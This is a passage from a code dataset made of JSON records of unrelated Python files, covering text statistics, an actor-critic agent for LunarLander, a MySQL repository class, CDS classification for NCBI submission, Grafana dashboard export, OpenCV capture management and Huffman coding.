lst\n\ndef main():\n txt = open(input(\"please input file name: \"),'r', encoding = 'UTF-8').read()\n clock()#时间初始化\n #信息输出\n print(\"基本信息输出......\")\n print(\"字符数:\",len(txt))\n print(\"行数:\",txt.count('\\n'))\n print(\"词数:\",len(normalize(txt).split()))\n print(\"高频词汇......\")\n lst = get_top(textstats(txt))\n for i in range(10):\n print(\"No.{n:2} {word:15}{times}\".format(n=i+1,\n word=lst[i][1],\n times=lst[i][0]))\n print('用时: %.3fs' %clock())#第二次调用clock将会返回计时\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"primer/textstats.py","file_name":"textstats.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"652470304","text":"import warnings\nwarnings.filterwarnings('ignore')\nimport multiprocessing\nimport os\nimport pickle\nimport numpy as np\nimport gym\nimport tensorflow as tf\nfrom keras.layers import Dense, Activation, Dropout, Input\nfrom keras.models import Sequential, Model, load_model, model_from_json\nfrom keras.optimizers import Adam\nimport keras.backend as K\nfrom collections import deque\nfrom timeit import default_timer as timer\nfrom tqdm import tqdm\nfrom copy import deepcopy\nimport random\n\nclass PolicyEstimator:\n def __init__(self, env, name=None, gamma=0.99, n_steps=5):\n # Environment specifics\n self.env = env\n self.env_name = env.unwrapped.spec.id\n self.gamma = gamma\n self.G_n, self.advantages = 0, 0\n self.n_steps = n_steps\n self.input_shape = env.observation_space.shape\n self.n_outputs = env.action_space.n\n self.action_space = [i for i in range(self.n_outputs)]\n # Neural network architecture\n self.p1_dims = 50\n self.p2_dims = 50\n self.v1_dims = 250\n self.v2_dims = 250\n self.lr1, self.lr2 = 1e-3, 1e-3\n # Memory\n self.states, self.actions, self.rewards, self.next_states, self.g_ns = [], [], [], [], []\n self.REPLAY_MEMORY = deque(maxlen=10000)\n self.MIN_REPLAY_MEMORY_SIZE = 1000 # Minimum number of steps in a memory to start training\n self.UPDATE_TARGET_EVERY = 2 # How often to sync. target and true value networks\n self.MINIBATCH_SIZE = 32\n self.target_update_counter = 0\n # Stats for tracking performance\n self.scores = []\n self.weights1 = [] # First weight matrix\n self.weights2 = [] # Second weight matrix\n\n self.policy_nn, self.predict_nn, self.value_nn = self.create_models()\n self.target_value_nn = deepcopy(self.value_nn) # Target network used for stabilisation\n\n if name:\n subdir_name = \"/\".join([self.env_name, name])\n self.scores = pickle.load(open(\"{}/scores.p\".format(subdir_name),\"rb\"))\n self.policy_nn.load_weights(\"{}/PolicyNN-weights.h5\".format(subdir_name))\n self.predict_nn.load_weights(\"{}/PredictNN-weights.h5\".format(subdir_name))\n\n def create_models(self):\n input = Input(shape=self.input_shape)\n advantages = Input(shape=[1])\n dense1 = Dense(self.p1_dims, activation=\"relu\")(input)\n dense2 = Dense(self.p2_dims, activation=\"relu\")(dense1)\n probs = Dense(self.n_outputs, activation=\"softmax\")(dense2)\n\n #v_input = Input(shape=self.input_shape)\n v_dense1 = Dense(self.v1_dims, activation=\"relu\")(input)\n v_dense2 = Dense(self.v2_dims, activation=\"relu\")(v_dense1)\n v_out = Dense(1, activation=\"linear\")(v_dense2)\n value_nn = Model(input=[input], output=[v_out])\n #value_nn.compile(optimizer=Adam(lr=self.lr1), loss='mse')\n value_nn.compile(optimizer=\"rmsprop\", loss='mse')\n\n def custom_loss(y_true, y_pred):\n out = K.clip(y_pred, 1e-12, 1-1e-12) # Numerical stability of log\n ll = y_true*K.log(out)\n return K.sum(-ll*advantages)\n\n policy = Model(input=[input, advantages], output=[probs])\n #policy.compile(optimizer=Adam(lr=self.lr2), loss=custom_loss)\n policy.compile(optimizer=\"rmsprop\", loss=custom_loss)\n\n predict = Model(input=[input], output=[probs])\n\n return policy, predict, value_nn\n\n def choose_action(self, state):\n state = state[np.newaxis, :]\n probabilities = self.predict_nn.predict(state)[0]\n action = np.random.choice(self.action_space, p=probabilities)\n return action\n\n def update_replay_memory(self, transition):\n self.REPLAY_MEMORY.append(transition)\n\n def store_transition(self, state, action, reward, next_state, done):\n self.states.append(state)\n self.actions.append(action)\n self.rewards.append(reward)\n self.next_states.append(next_state)\n self.update_replay_memory((state, action, reward, next_state, done))\n\n def clear_transitions(self):\n self.states, self.actions, self.rewards, self.next_states = [], [], [], []\n\n def learn(self):\n state_memory = np.array(self.states)\n action_memory = np.array(self.actions)\n reward_memory = np.array(self.rewards)\n next_state_memory = np.array(self.next_states)\n discount_filter_n = np.flip(self.gamma ** np.arange(0, self.n_steps))\n G_n = np.convolve(reward_memory, discount_filter_n)[-reward_memory.shape[0]:] # n-step return before value fn.\n discount_filter_inf = np.flip(self.gamma ** np.arange(0, reward_memory.shape[0]))\n G_inf = np.convolve(reward_memory, discount_filter_inf)[-reward_memory.shape[0]:] # Total discounted return\n # Append zeros for last n states, v(s_end) = 0\n state_vals = np.hstack((np.squeeze(self.value_nn.predict(state_memory[self.n_steps:])), np.zeros(self.n_steps)))\n G_n += (self.gamma**self.n_steps)*state_vals # n-step value function added to give full n-step return\n\n # One hot encoding of actions\n actions = np.zeros([len(action_memory), self.n_outputs])\n actions[np.arange(len(action_memory)), action_memory] = 1\n\n # n step actor-critic td errors as in Sutton-Barto\n td_errors = G_n - np.squeeze(self.value_nn.predict(state_memory))\n\n self.value_nn.fit(state_memory, G_n, batch_size=int(len(state_memory)//10), shuffle=True, verbose=0)\n self.policy_nn.fit([state_memory, td_errors], actions, batch_size=int(len(state_memory)//10), shuffle=True, verbose=0)\n\n self.clear_transitions()\n return\n\n def update_stats(self, score):\n self.scores.append(score)\n\n def train_value_fn(self, terminal_state):\n if len(self.REPLAY_MEMORY) < self.MIN_REPLAY_MEMORY_SIZE:\n return\n\n minibatch = np.array(random.sample(self.REPLAY_MEMORY, self.MINIBATCH_SIZE))\n expand = lambda x: np.stack(x, axis=0)\n current_states = expand(minibatch[:, 0])\n rewards = expand(minibatch[:, 2])\n new_states = expand(minibatch[:, 3])\n end_states = expand(minibatch[:, 4]) # Value should be zero for end state.\n\n value_targets = rewards + self.gamma*np.squeeze(self.target_value_nn.predict(new_states))*(1-end_states)\n\n self.value_nn.fit(current_states, value_targets, batch_size=self.MINIBATCH_SIZE, verbose=0, shuffle=False)\n\n # Determine if we want to update target_model\n if terminal_state:\n self.target_update_counter += 1\n\n if self.target_update_counter > self.UPDATE_TARGET_EVERY:\n self.target_value_nn.set_weights(self.value_nn.get_weights()) # Synchronise neural nets\n self.target_update_counter = 0\n\n def save_model(self, name):\n self.policy_nn.save_weights(\"{}/PolicyNN-weights.h5\".format(name))\n self.predict_nn.save_weights(\"{}/PredictNN-weights.h5\".format(name))\n if self.value_nn:\n self.value_nn.save_weights(\"{}/ValueNN-weights.h5\".format(name))\n return 'Saved model weights'\n\n def save_all(self, name):\n if not os.path.isdir(self.env_name):\n os.makedirs(self.env_name)\n subdir_name = \"/\".join([self.env_name, name])\n if not os.path.isdir(subdir_name):\n os.makedirs(subdir_name)\n #pickle.dump(self.weights1, open(f\"{subdir_name}/weights1.p\", \"wb\"))\n #pickle.dump(self.weights2, open(f\"{subdir_name}/weights2.p\", \"wb\"))\n pickle.dump(self.scores, open(\"{}/scores.p\".format(subdir_name), \"wb\"))\n with open(\"{}/specs.txt\".format(subdir_name), \"a\") as text_file:\n #text_file.write(\"lr = {}\\n\".format(self.lr))\n text_file.write(\"gamma = {}\\n\".format(self.gamma))\n text_file.write(\"n_steps = {}\\n\".format(self.n_steps))\n self.save_model(subdir_name)\n\n\ndef main(EPISODES=3000, LOAD_MODEL=None, save_name=None, n_steps=5, gamma=0.99, seed=1):\n env = gym.make('LunarLander-v2')\n np.random.seed(seed)\n env.seed(seed)\n # LOAD_MODEL = \"NB0.99\"\n agent = PolicyEstimator(env, LOAD_MODEL, gamma, n_steps)\n\n # Iterate over episodes\n\n steps = []\n scores = []\n for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):\n show = False\n if not episode % (EPISODES//10) and LOAD_MODEL:\n show = True\n current_state = env.reset()\n score, no_steps, discount = 0, 0, 1\n # Reset flag and start iterating until episode ends\n done = False\n start = timer()\n discounted_sum = 0\n while not done:\n action = agent.choose_action(current_state)\n next_state, reward, done, _ = env.step(action)\n\n if show:\n env.render()\n agent.store_transition(current_state, action, reward, next_state, done)\n #if random.random() < 0.5:\n # agent.train(done)\n current_state = next_state\n score += reward\n no_steps += 1 # Max steps\n agent.update_stats(score)\n ep_time = timer() - start\n steps.append(no_steps)\n scores.append(score)\n start = timer()\n agent.learn()\n training_time = timer() - start\n if score > 200:\n print(\"Solved on episode {}\".format(episode))\n if not episode % 10:\n print(ep_time, \"seconds of episode\")\n print(training_time, \"to train\")\n print(\"{} score, mean score {}, {} mean no. steps\".format(score, np.mean(scores[-50:]), np.mean(steps[-50:])))\n if save_name:\n agent.save_all(save_name)\n\n\nif __name__ == \"__main__\":\n n_steps, gamma = 10, 0.99\n load_model, save_model = \"AC99\", None\n load_model, save_model = None, \"AC-10-99\"\n main(1000, load_model, save_model, n_steps=n_steps, gamma=gamma)\n","sub_path":"ModelFree/ActorCritic/nStepAC.py","file_name":"nStepAC.py","file_ext":"py","file_size_in_byte":9876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"509988232","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis class represents a Repository - a layer that works with database\n\"\"\"\n\nimport mysql.connector\n\nfrom config import MYSQL_SETTINGS as db_setting\n\n\nclass BaseRepository(object):\n \"\"\"\n This is base class for Repository pattern\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n self.connection = mysql.connector.connect(**db_setting)\n self._completed = False\n\n def __enter__(self):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n \"\"\"\n\n :param exc_type:\n :type exc_type:\n :param exc_val:\n :type exc_val:\n :param exc_tb:\n :type exc_tb:\n :return:\n :rtype:\n \"\"\"\n self.close()\n\n def complete(self):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n self._completed = True\n\n def close(self):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n if self.connection:\n try:\n if self._completed:\n self.connection.commit()\n else:\n self.connection.rollback()\n except Exception as e:\n raise e\n finally:\n try:\n self.connection.close()\n except Exception as e:\n raise e","sub_path":"synergy/repository/baserepository.py","file_name":"baserepository.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"126287450","text":"#!/usr/bin/env python\n\"\"\"Make a lookup table of CDS features for each gene in the Northern Wild Rice\ngenome annotation that contains information for making the NCBI feature table.\nThis script will extract the sequence and check it for completeness: length is\na multiple of three, first codon is Met, final codon is Stop. Requires\nBiopython. Takes two arguments:\n 1) GFF3\n 2) FASTA\"\"\"\n\nimport sys\nimport gzip\nimport re\ntry:\n from Bio import SeqIO\n from Bio.Seq import Seq\n from Bio.SeqFeature import SeqFeature\n from Bio.SeqFeature import FeatureLocation, CompoundLocation\nexcept ImportError:\n sys.stderr.write('This script requires Biopython.\\n')\n sys.exit(1)\n\n# Set arguments\ntry:\n gff_in = sys.argv[1]\n fasta_in = sys.argv[2]\nexcept IndexError:\n sys.stderr.write(__doc__ + '\\n')\n sys.exit(1)\n\n\ndef parse_gff(g):\n \"\"\"Parse the GFF file, and return two dictionaries that describe the\n features and the parent/child relationships.\"\"\"\n # We also want to store the mRNA->gene information!\n mrna_par = {}\n # And the CDS->mRNA information\n cds_dat = {}\n with open(g, 'r') as f:\n for line in f:\n # if the line is empty or starts with a #, we will skip it\n if line.startswith('#') or line == '\\n':\n continue\n else:\n tmp = line.strip().split('\\t')\n feat_type = tmp[2]\n if feat_type == 'mRNA':\n meta = tmp[8].split(';')\n for m in meta:\n if m.startswith('ID='):\n tx_id = m.split('=')[1]\n if m.startswith('Parent='):\n tx_par = m.split('=')[1]\n mrna_par[tx_id] = tx_par\n elif feat_type == 'CDS':\n scaf = tmp[0]\n start = tmp[3]\n end = tmp[4]\n strand = tmp[6]\n phase = tmp[7]\n meta = tmp[8].split(';')\n for m in meta:\n if m.startswith('ID='):\n cds_id = m.split('=')[1]\n if m.startswith('Parent='):\n cds_par = m.split('=')[1]\n if strand == '-':\n strand = -1\n else:\n strand = 1\n # Watch out for transcripts where there are multiple CDS.\n # This will require a nested dictionary of lists.\n if cds_par in cds_dat:\n pass\n else:\n cds_dat[cds_par] = {}\n if cds_id in cds_dat[cds_par]:\n pass\n else:\n cds_dat[cds_par][cds_id] = []\n # We want to make a SequenceFeature for each CDS chunk\n # Keep in mind that GFF is 1-based, so we have to adjust\n # the start position!\n cds_feat = SeqFeature(\n FeatureLocation(int(start)-1, int(end), strand=strand),\n type=\"CDS\",\n id=cds_id)\n # Add some qualifiers to modify the behavior\n # Use the \"standard\" genetic code from NCBI\n cds_feat.qualifiers['transl_tabl'] = [1]\n # Then, append it into the corresponding dictionary item\n # keeping the chromosome (scaffold) name and phase with it\n cds_dat[cds_par][cds_id].append((cds_feat, scaf, phase))\n else:\n continue\n return (mrna_par, cds_dat)\n\n\ndef combine_features(c_dat):\n \"\"\"Step through the CDS dictionary and process it down by combining pieces\n that had to be listed as separate chunks in the GFF.\"\"\"\n # They are keyed on transcript ID\n for tx in c_dat:\n for cds in c_dat[tx]:\n cds_pieces = c_dat[tx][cds]\n # If there fewer than 2 CDS chunks, then pull the tuple out of the\n # list.\n if len(cds_pieces) < 2:\n c_dat[tx][cds] = cds_pieces[0]\n else:\n # Join pieces\n locs = []\n ph = []\n for chunk in cds_pieces:\n c_loc = FeatureLocation(\n chunk[0].location.start,\n chunk[0].location.end,\n strand=chunk[0].strand)\n locs.append(c_loc)\n ph.append(chunk[2])\n # Sort them, according to strand. We assume that a CDS is not a\n # mixed-strand feature\n if cds_pieces[0][0].strand == 1:\n locs.sort(key=lambda x: x.start)\n else:\n locs.sort(key=lambda x: x.end, reverse=True)\n # Join them into a CompoundLocation\n full_loc = CompoundLocation(locs)\n # And then overwrite the input dictionary values\n full_feat = SeqFeature(full_loc, type='CDS',\n id=cds_pieces[0][0].id)\n full_feat.qualifiers['transl_tabl'] = [1]\n # Keep the phases!\n c_dat[tx][cds] = (full_feat, cds_pieces[0][1], ph)\n return c_dat\n\n\ndef process_cds(cfs, ref):\n \"\"\"Extract the coding sequence from the given reference sequence and\n process it. This is where we will apply our rules for length/etc.\"\"\"\n # unpack the tuple\n feat, scaffold, phase = cfs\n # First, extract the sequence of the CDS from the scaffold. This should\n # respect the strand, so we won't have to reverse-complement\n featseq = feat.extract(ref[scaffold])\n # Calculate the length of the codon-containing sequence\n cdslen = len(featseq)\n # Run a check to see if it is a multiple of 3 or not\n if cdslen % 3 == 0:\n mult_three = True\n else:\n mult_three = False\n # We want to take the phase of the first piece of the CDS and remove that\n # number of bases from the beginning. For some reason, it looks like the\n # phase is messed up here - 2 should be 1 and 1 should be 2?\n first_phase = int(phase[0])\n if first_phase == 2:\n first_phase = 1\n elif first_phase == 1:\n first_phase = 2\n # Save the updated phases\n new_phases = []\n for idx, p in enumerate(phase):\n if idx == 0:\n new_phases.append(str(first_phase))\n else:\n new_phases.append(p)\n featseq = featseq[first_phase:]\n # Then we will translate it\n cds_trans = featseq.translate(table=1)\n # How many parts does the CDS have?\n cds_numparts = str(len(feat.location.parts))\n # Extract the start positions and end positions\n cds_starts = [str(x.start) for x in feat.location.parts]\n cds_ends = [str(x.end) for x in feat.location.parts]\n # Check for 5-prime partial CDS\n if str(cds_trans.seq).startswith('M'):\n fiveprime_part = False\n else:\n fiveprime_part = True\n # Check for 3-prime partial CDS\n if str(cds_trans.seq).endswith('*'):\n threeprime_part = False\n else:\n threeprime_part = True\n # Let's do a thing where we check if the next triplet would be a stop\n # codon.\n if threeprime_part:\n # Adjust the positions by one codon, according to the strand\n if feat.strand == 1:\n newstart = feat.location.start\n newend = feat.location.end + 3\n else:\n newstart = feat.location.start - 3\n newend = feat.location.end\n # Make a new feature and set the qaulifiers\n new_feat = SeqFeature(\n FeatureLocation(newstart, newend, strand=feat.strand),\n type=\"CDS\",\n id=feat.id)\n new_feat.qualifiers['transl_tabl'] = [1]\n # Translate it\n new_trans = new_feat.translate(ref[scaffold])\n # Check if it ends in a stop\n if str(new_trans.seq).endswith('*'):\n next_codon_is_stop = True\n else:\n next_codon_is_stop = False\n else:\n next_codon_is_stop = 'NA'\n # Lastly, check for internal stop codons\n internal_stop_re = re.compile(r'^[^\\*].+\\*.+[^\\*]$')\n if internal_stop_re.match(str(cds_trans.seq)):\n has_i_stop = True\n else:\n has_i_stop = False\n cds_flags = (mult_three, fiveprime_part, threeprime_part, has_i_stop,\n cds_trans, cds_numparts, next_codon_is_stop, cdslen,\n cds_starts, cds_ends, new_phases)\n return cds_flags\n\n\ndef main(gff, fa):\n \"\"\"Main function.\"\"\"\n # First, we want to parse the GFF3 and store it in memory.\n tx_gene, cds_features = parse_gff(gff)\n # Then we process the CDS dictionary to make complete CDS features for\n # every transcript\n cds_features = combine_features(cds_features)\n # Read the reference genome into memory\n ref = SeqIO.to_dict(SeqIO.parse(fa, 'fasta'))\n # Print a header!\n header = ['CDS.ID', 'Chunk.Num.Parts', 'CDS.Len', 'Tx.ID', 'Gene.ID',\n 'Scaffold', 'Starts', 'Ends', 'Strand', 'Phase', 'Mult.Three',\n '5prime.Partial', '3prime.Partial', 'Next.Codon.is.Stop',\n 'Has.Interal.Stops', 'CDS.Trans']\n print('\\t'.join(header))\n # For each CDS feature, calculate its flags and then print it out. The\n # data are keyed on transcript ID\n for tx in cds_features:\n for cds in cds_features[tx]:\n # First, get the parent info\n parent_gene = tx_gene.get(tx, 'Unknown')\n # Classify the sequences\n cds_class = process_cds(cds_features[tx][cds], ref)\n phs = ','.join(cds_class[10])\n # Then print out the info! We will print it out in this order:\n # - CDS ID\n # - Number of CDS parts\n # - CDS length\n # - Parent transcript ID\n # - Parent gene ID\n # - Scaffold\n # - Start\n # - End\n # - Strand\n # - Multiple of 3?\n # - 5-prime partial?\n # - 3-prime partial?\n # - Next codon is stop?\n # - Internal stops?\n # - Translated sequence\n cds_id = cds_features[tx][cds][0].id\n num_parts = cds_class[5]\n cds_len = str(cds_class[7])\n scaffold = cds_features[tx][cds][1]\n strand = str(cds_features[tx][cds][0].strand)\n transeq = str(cds_class[4].seq)\n internal_stop = str(cds_class[3])\n threeprime_part = cds_class[2]\n fiveprime_part = cds_class[1]\n mult_three = str(cds_class[0])\n next_is_stop = str(cds_class[6])\n # This is going to be a bit hairy! We will have to set the \"real\"\n # start and end based on the GFF positions and the reported strand\n # Then, if a feature is partial in one direction, we will have to\n # modify its start/end, but also keep in mind the strand, i.e., for\n # three-prime partial features, the *first* (sorted by coordinate)\n # feature will have to be modified. Also remember to add 1 to the\n # gff_starts values to convert it back to 1-based coordinates!\n gff_starts = [str(int(i)+1) for i in cds_class[8]]\n gff_ends = cds_class[9]\n if strand == '1':\n real_starts = gff_starts\n real_ends = gff_ends\n else:\n real_starts = gff_ends\n real_ends = gff_starts\n\n # Check five-prime partialness.\n if fiveprime_part:\n real_starts[0] = '<' + real_starts[0]\n # And the threeprime partialness\n if threeprime_part:\n real_ends[-1] = '>' + real_ends[-1]\n # And turn the starts and stops into printable things\n p_starts = ','.join(real_starts)\n p_ends = ','.join(real_ends)\n toprint = [\n cds_id,\n num_parts,\n cds_len,\n tx,\n parent_gene,\n scaffold,\n p_starts,\n p_ends,\n strand,\n phs,\n mult_three,\n str(fiveprime_part),\n str(threeprime_part),\n next_is_stop,\n internal_stop,\n transeq]\n print('\\t'.join(toprint))\n return\n\n\nmain(gff_in, fasta_in)\n","sub_path":"MSI-RIS/Kimball_WR_Annotation/Scripts/Data_Handling/Classify_CDS_For_NCBI_Submission.py","file_name":"Classify_CDS_For_NCBI_Submission.py","file_ext":"py","file_size_in_byte":12622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292237218","text":"import re\n\nhand =open('short.txt')\nnumlist = list()\n\nfor line in hand:\n line =line.rstrip()\n\n stuff = re.findall('^X-DSPAM-Confidence: ([0-9.]+)', line)\n if len(stuff) != 1:\n continue\n num = float(stuff[0])\n numlist.append(num)\nprint(f'Maximum:{max(numlist)}')\n\nx= 'We just received $10.00 for choice.'\ny = re.findall('\\$[0-9.]+',x)\nprint(y)\n\nx = 'From: Using the : character'\ny = re.findall('^F.+:', x)\nprint(y)\n\n","sub_path":"coursera/Python to Access Web Data/11_1_regular_expression_spam_confidence.py","file_name":"11_1_regular_expression_spam_confidence.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"507748648","text":"import cv2\nimport numpy as np\nimport time\n\n'''\n本类用于提取视频流。\nCaptureManager类用于读取新的帧,并能将帧分派到一个或者多个输出中,这些输出包括静止的图像文件、视频文件以及窗口。\n'''\nclass CaptureManager(object):\n\n def __init__(self,\n capture,\n previewWindowmanager = None,\n shouldMirroPreview = False):\n self.previewWindowManager = previewWindowmanager\n self.shouldMirroPreview = shouldMirroPreview\n\n self._capture = capture\n self._channel = 0\n self._enteredFrame = False\n self._frame = None\n self._imageFileName = None\n self._videoFileName = None\n self._videoEncoding = None\n self._videoWriter = None\n self._startTime = None\n self._framesElapsed = 0\n self._fpsEstimate = None\n\n '''@property是一个装饰器(decorator),装饰器可以给函数动态加上功能。\n Python内置的@property装饰器就是负责把一个方法变成属性调用的,使用后会对函数的参数进行检查。'''\n\n @property #定义内联函数\n def channel(self):\n return self._channel\n\n @property\n def channel(self, value):\n if self._channel != value:\n self._channel = value\n self._frame = None\n\n @property\n def frame(self):\n if self._enteredFrame and self._frame is None:\n _, self._frame = self._capture.retrieve()\n return self._frame\n\n @property\n def isWritingImage(self):\n return self._imageFileName is not None\n\n @property\n def isWritingVideo(self):\n return self._videoFileName is not None\n\n #捕获下一帧\n def enterFrame(self): #检查先前帧是否退出\n assert not self._enteredFrame, 'previous enterFrame()had no matching exitFrame()'\n\n if self._capture is not None:\n self._enteredFrame = self._capture.grab()\n\n #Draw to window,write to file,release the frame\n def exitFrame(self):\n if self.frame is None:\n self._enteredFrame = False\n return\n if self._framesElapsed == 0:\n self._startTime = time.time()\n else:\n timeElapsed = time.time() - self._startTime\n self._fpsEstimate = self._framesElapsed / timeElapsed\n self._framesElapsed += 1\n\n '''Draw to window'''\n if self.previewWindowManager is not None:\n if self.shouldMirroPreview:\n mirroedFrame = np.fliplr(self._frame).copy()\n self.previewWindowManager.show(mirroedFrame)\n else:\n self.previewWindowManager.show(self._frame)\n\n '''write to image file'''\n if self.isWritingImage:\n cv2.imwrite(self._imageFileName, self._frame)\n self._imageFileName = None\n\n '''write to video'''\n if self.isWritingVideo:\n self._writeVideoFrame()\n #Release the frame\n self._frame = None\n self._enteredFrame = False\n\n def writeImage(self, filename):\n self._imageFileName = filename #将下一个已存在的帧写入image文件\n\n def startWriteVideo(self,\n filename,\n encoding = cv2.VideoWriter_fourcc('I','4','2','0')):\n self._videoFileName = filename\n self._videoEncoding = encoding\n\n def stopWriteVideo(self):\n self._videoFileName = None\n self._videoEncoding = None\n self._videoWriter = None\n\n '''_writeVideoFrame()函数可以创建或者向视频追加内容'''\n def _writeVideoFrame(self):\n if not self.isWritingVideo:\n return\n\n if self._videoWriter is None:\n fps = self._capture.get(cv2.CAP_PROP_FPS)\n #捕获的FPS未知因而需要预估(FPS:frames per second,帧速率)\n if fps == 0.0:\n if self._fpsEstimate < 20: #过20帧以让估计更准确\n return\n else:\n fps = self._fpsEstimate\n size = (int(self._capture.get(\n cv2.CAP_PROP_FRAME_WIDTH)),\n int(self._capture.get(\n cv2.CAP_PROP_FRAME_HEIGHT)))\n self._videoWriter = cv2.VideoWriter(\n self._videoFileName,\n self._videoEncoding,\n fps,\n size)\n\n self._videoWriter.write(self._frame)\n\nclass windowManager(object):\n #该类用于抽象窗口和键盘\n def __init__(self,\n windowName,\n keyPressCallback = None):\n self.keypressCallback = keyPressCallback\n self._windowName = windowName\n self._isWindowCreated = False\n\n @property\n def isWindowCreated(self):\n return self._isWindowCreated\n\n def createWindow(self):\n cv2.namedWindow(self._windowName)\n self._isWindowCreated = True\n\n def show(self, frame):\n cv2.imshow(self._windowName, frame)\n\n def destoryWindow(self):\n cv2.destroyWindow(self._windowName)\n self._isWindowCreated = False\n\n def processEvents(self):\n keycode = cv2.waitKey(1)\n if self.keypressCallback is not None and keycode != -1:\n keycode &= 0xff\n self.keypressCallback(keycode)","sub_path":"openCV/Chapter3/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"625791685","text":"IMG_PATH = 'data/train/ship/'\nSEG_PATH = 'data/label/'\nSAVE_WEIGHTS_PATH = 'results/'\nSEG_FILE = 'data/train_ship_segmentations_v2.csv'\n\nTEST_IMG_PATH = 'data/train/ship/'\nSEG_RESULT_PATH = 'data/seg_results/'\nINTER_RESULT_PATH = 'data/inter_results/test/'\nSCORE_RESULT_PATH = 'data/score_results/'\n\nimg_size_ori = 768\nimg_size_target = 768\nbatch_size = 1 # 256:64, 384:32, 768:6(8)\nepochs = 10\n\nthreshold = 0.5\n\n","sub_path":"train_unet34_param.py","file_name":"train_unet34_param.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"416811576","text":"#!/usr/bin/env python\n\"\"\"\nPurpose: export all dashboards from grafana server\nAuthor: Margin Hu\nVersion: 1.0\n\"\"\"\n\nimport os,sys\nimport urllib2\nimport ConfigParser\nimport requests\nimport json\n\nclass grafana_portal:\n def __init__(self):\n self.key=\"\"\n self.url=\"\"\n\ndef modify_title(title):\n title.replace(\" \",\"_\")\n title.replace(\":\",\"_\")\n\n\ndef config_parse(conf,gp):\n cf = ConfigParser.ConfigParser()\n cf.read(conf)\n gp.url = cf.get(\"grafana\",\"url\")\n gp.key = cf.get(\"grafana\",\"key\") \n\ndef get_dashboard_list(gp):\n url = gp.url+\"/api/search/\"\n print(\"url\",url)\n req = urllib2.Request(url)\n req.add_header(\"Authorization\",\"Bearer %s\"% gp.key)\n\n response = urllib2.urlopen(req)\n body = response.read()\n body_list= json.loads(body)\n print(body_list)\n return body_list\n\ndef export_dashboard(dash,gp):\n uid = dash['id']\n title=dash['title']\n uri = dash['uri']\n file_path=\"/tmp/dashboard/\" \n if not os.path.exists(file_path):\n os.makedirs(file_path)\n\n file_name=file_path+title\n \n url = gp.url+\"/api/dashboards/%s\"%uri\n print(\"uid=%d,url is:\"%uid, url)\n\n req = urllib2.Request(url)\n req.add_header(\"Authorization\",\"Bearer %s\"% gp.key)\n\n response = urllib2.urlopen(req)\n body = response.read()\n print(\"uid=%d,response is:\"%uid, body) \n\n with open(file_name,'w') as outfile:\n outfile.write(body)\n outfile.close()\n\n\ndef main():\n if (len(sys.argv) < 2):\n print(\"Usage: %s grafana.ini\"% sys.argv[0])\n \n gp = grafana_portal()\n config_parse(sys.argv[1],gp) \n \n dlist = get_dashboard_list(gp) \n for dash in dlist:\n export_dashboard(dash,gp) \n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","sub_path":"grafana/grafana4.2/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"185497694","text":"import numpy as np\n\n\nclass SharpeRatio:\n def __init__(self, std_precision=1e-6):\n self.std_precision = std_precision\n self.num = None\n self.sum = None\n self.sqr_sum = None\n self.reset()\n\n def reset(self):\n self.num = 0\n self.sum = 0\n self.sqr_sum = 0\n\n def add(self, value):\n self.num += 1\n self.sum += value\n self.sqr_sum += value ** 2\n\n def get(self):\n assert self.num != 0, \"Need at least one number.\"\n mean = self.sum / self.num\n sqr_mean = self.sqr_sum / self.num\n s2 = sqr_mean - mean ** 2\n\n std = np.sqrt(s2) + self.std_precision\n return mean / std\n","sub_path":"utils/accum_sharpe_ratio.py","file_name":"accum_sharpe_ratio.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"112557238","text":"\n# Huffman Coding in python\n\n# Creating tree nodes\nclass NodeTree(object):\n\n def __init__(self, left=None, right=None):\n self.left = left\n self.right = right\n\n def children(self):\n return (self.left, self.right)\n\n def nodes(self):\n return (self.left, self.right)\n\n def __str__(self):\n return '%s_%s' % (self.left, self.right)\n\n\n# Main function implementing huffman coding\ndef huffman_code_tree(node, left=True, binString=''):\n if type(node) is str:\n return {node: binString}\n (l, r) = node.children()\n d = dict()\n d.update(huffman_code_tree(l, True, binString + '0'))\n d.update(huffman_code_tree(r, False, binString + '1'))\n return d\n\n \n# nodes = freq\n\n\n# while len(nodes) > 1:\n# (key1, c1) = nodes[-1]\n# (key2, c2) = nodes[-2]\n# nodes = nodes[:-2]\n# node = NodeTree(key1, key2)\n# nodes.append((node, c1 + c2))\n\n# nodes = sorted(nodes, key=lambda x: x[1], reverse=True)\n\n# huffmanCode = huffman_code_tree(nodes[0][0])\n\n\nclass Huffman:\n def __init__(self, fd):\n self.fd = fd\n \n\n def huffman_code_tree(self, node, left=True, binString=''):\n if type(node) is str:\n return {node: binString}\n (l, r) = node.children()\n d = dict()\n d.update(huffman_code_tree(l, True, binString + '0'))\n d.update(huffman_code_tree(r, False, binString + '1'))\n return d\n\n def sort(self):\n nodes = self.fd\n\n while len(nodes) > 1 :\n (key1, 